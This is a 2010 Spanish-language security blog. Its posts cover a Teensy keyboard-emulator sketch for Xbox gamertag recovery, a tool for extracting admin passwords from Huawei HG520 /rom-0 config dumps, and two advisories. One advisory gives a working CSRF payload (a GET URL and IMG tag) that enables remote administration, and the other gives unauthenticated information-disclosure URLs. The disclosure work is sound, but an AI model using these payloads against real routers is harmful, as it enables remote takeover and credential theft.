Facebook de Hakim.ws - http://facebook.com/hakimws
Publicado el 14/07/2010 12:07:00 en Off Topic.
He creado una página de Facebook para Hakim.ws:
http://www.facebook.com/hakimwsComentarios: 0 | Leer comentarios
XBOX360 Gamertag Recovery con Teensy 2.0
Publicado el 07/07/2010 12:07:00 en Programación General. Total de votos: 2 Votar
En XBOX existen los Gamer Points. Son una especie de retos que te asignan un puntaje a tu cuenta de Xbox Live. Algunos gamers coleccionan estos puntos, incluso hay algunos que juegan todos los juegos solamente por los puntos. Pero existe un inconveniente...
Si estas en casa de un amigo y quieres acumular estos puntos necesitas "Recuperar tu Gamertag" que es descargar tu perfil en la consola de tu amigo. Este es un proceso lento y si no tienes un teclado USB conectado a tu Xbox es aun mas tardado ya que tienes que introducir letra por letra tu email, password y cuenta de Xbox Live.
Utilizando el controlador Teensy 2.0 se puede emular un teclado y ponerle un programa que envie toda la informacion necesaria en el momento adecuado. Este dispositivo es muy peque~o, del tama~o de una memoria USB y se conecta al Xbox por USB.
En la siguiente liga hay un video que muestra su uso:
http://hakim.ws/teensy/xbox360_gamertag_recovery/
Utilizando el Teensyduino para programarlo como emulador de teclado usb se puede utilizar el siguiente codigo para realizar la recuperacion automatica del gamertag. Unicamente es necesario cambiar GAMERTAG, EMAIL@DDRESS, y PASSWORD:
// XBOX360 Gamertag Recovery using Teensy 2.0
// hkm @ hakim.ws
// http://hakim.ws/teensy/xbox360_gamertag_recovery/
//
// JUST REPLACE FOLLOWING STRINGS:
char gamertag[] = "GAMERTAG";
char email[] = "EMAIL@DDRESS";
char pass[] = "PASSWORD";
// END REPLACE - Done
// Plug before Gamertag field selection
int ledPin = 11;
void setup() {
pinMode(ledPin, OUTPUT);
}
void loop(){
delay(3000);
Enter(); //select Gamertag
delay(3000);
CommandAtXbox(gamertag); //send Gamertag
delay(1000);
Enter(); //select Done
delay(5000);
Enter(); //select Continue
delay(4000);
CommandAtXbox(email); //send Email address
delay(1000);
Enter(); //select Done
delay(5000);
CommandAtXbox(pass); //send Password
Enter(); //select Sign in
delay(13000);
Up();
Enter(); //select Accept
while (1)
delay(20000); //END (you should remove it now)
}
void CommandAtXbox(char *SomeCommand){ //from irongeek
digitalWrite(ledPin, HIGH); // set the LED on
Keyboard.set_modifier(0); //prep release of control keys
Keyboard.set_key1(0); //have to do this to keep it from hitting key multiple times.
Keyboard.send_now(); //Send the key changes
delay(1000);
Keyboard.print(SomeCommand);
Keyboard.set_key1(KEY_ENTER);
Keyboard.send_now();
Keyboard.set_key1(0);
Keyboard.send_now();
digitalWrite(ledPin, LOW); // set the LED off
}
void Enter(){
delay(1000);
digitalWrite(ledPin, HIGH); // set the LED on
Keyboard.set_modifier(0); //prep release of control keys
Keyboard.set_key1(0); //have to do this to keep it from hitting key multiple times.
Keyboard.send_now(); //Send the key changes
delay(500);
Keyboard.set_key1(KEY_ENTER);
Keyboard.send_now();
Keyboard.set... [/url][/trombi]
Continúa aquí...Comentarios: 2 | Leer comentarios
Huawei HG520 /rom-0 herramienta para descompresion
Publicado el 14/06/2010 12:06:00 en Hacking Tools. Total de votos: 3 Votar
Los módems Huawei HG520, y muchos más, utilizan el ZynOS el cual tiene una vulnerabilidad conocida que consiste en poder descargar la configuración sin autenticación. La configuración se encuentra localizada en la interfaz web en /rom-0
El archivo rom-0 es un archivo binario comprimido en formato LZW. Con la información del sitio de
Kender podemos crear la herramienta para descomprimir este archivo y parsear la información como clave de administrador, WEP default, versiones, etc.
Desde la siguiente URL se puede descargar el código fuente modificado y una versión compilada de la herramienta:
http://www.hakim.ws/huawei/rom-0
hkm
**Nota: No funciona al 100% en todas las configuraciones.
*Nota2: Esto es lo que varios estaban buscando, una forma para sacar la clave de administracion.
Comentarios: 2 | Leer comentarios
Huawei EchoLife HG520 CSRF para habilitar admin remota
Publicado el 30/05/2010 12:05:00 en Hacking Web. Total de votos: 2 Votar
=========================================
HUAWEI ECHOLIFE HG520 RemoteManagement CSRF
=========================================
Dispositivo: Huawei EchoLife HG520
Version de Software: V100R001B021Telmex
V100R001B020Telmex
Version de Firmware: 3.10.18.7-1.0.7.0 (ultima version)
3.10.18.5-1.0.7.0
Modelos Vulnerables: HG520c
HG520b
Fecha de publicacion: 2010-05-29
Criticidad: Alto
Impacto: Habilita la interfaz de administracion remota en la WAN
Ubicacion: En la interfaz de administracion web (LAN/WAN)
Solucion: No existe solucion disponible en este momento
Websec-id: ws10-12
DESCRIPCION
=======================
Los modems HG520 publican una interfaz de administracion via web en la red local. Las paginas '/Forms/access_cwmp_1', '/Forms/rpQos_1' y '/Forms/rpRManage_1' no requieren autenticacion, se puede realizar un ataque de CSRF para habilitar el acceso a las interfaces de administracion desde internet.
EXPLOIT / POC
=======================
Se habilita el acceso remoto por FTP, TELNET y WEB mandando una peticion GET a:
http://192.168.1.254/Forms/rpRManage_1?ACL_active=0
Se podria usar Client-Side visitando una pagina que contenga:
<IMG SRC=http://192.168.1.254/Forms/rpRManage_1?ACL_active=0>
SOLUCION
=======================
No existe parche o solucion disponible en este momento.
DISCLOSURE TIMELINE
=======================
2010/03/20 - Vulnerability discovered
REFERENCES
=======================
Hakim.Ws - http://www.hakim.ws
Pueden ver el video aqui:
http://www.hakim.ws/huawei/HG520_csrf.flv
http://websec.mx/advisories/view/Huawei_EchoLife_HG520_RemoteManagement_CSRFComentarios: 2 | Leer comentarios
Huawei EchoLife HG520c revelacion de info en interfaz web
Publicado el 17/05/2010 12:05:00 en Hacking Web. Total de votos: 2 Votar
==============================================
HUAWEI ECHOLIFE HG520c Revelacion de Informacion
==============================================
Dispositivo: EchoLife HG520c
Version de Software: V100R001B021Telmex
V100R001B020Telmex
Version de Firmware: 3.10.18.7-1.0.7.0 (ultima version)
3.10.18.5-1.0.7.0
Modelos Vulnerables: HG520c
Fecha de publicacion: 2010-05-16
Criticidad: Bajo
Impacto: Revelacion de informacion
Donde: En la interfaz de administracion web (LAN/WAN)
Solucion: No existe solucion disponible en este momento
[Descripcion]
=================
La pagina '/Listadeparametros.html' muestra informacion sensible como la
version del software, la IP interna y el nombre de la red inalambrica.
No se necesita autenticacion para abir esta pagina.
[Exploit]
=================
Desde la LAN o por algun ataque Client-Side se puede abrir la pagina
'/Listadeparametros.html':
http://192.168.1.254/Listadeparametros.html
De forma remota, en caso de tener la interfaz web habilitada en la WAN:
http://<IP REMOTA>/Listadeparametros.html
hkm
hkm@hakim.ws
http://websec.mx/advisories/view/Huawei_HG520c_Revelacion_de_Informacion_via_webComentarios: 7 | Leer comentarios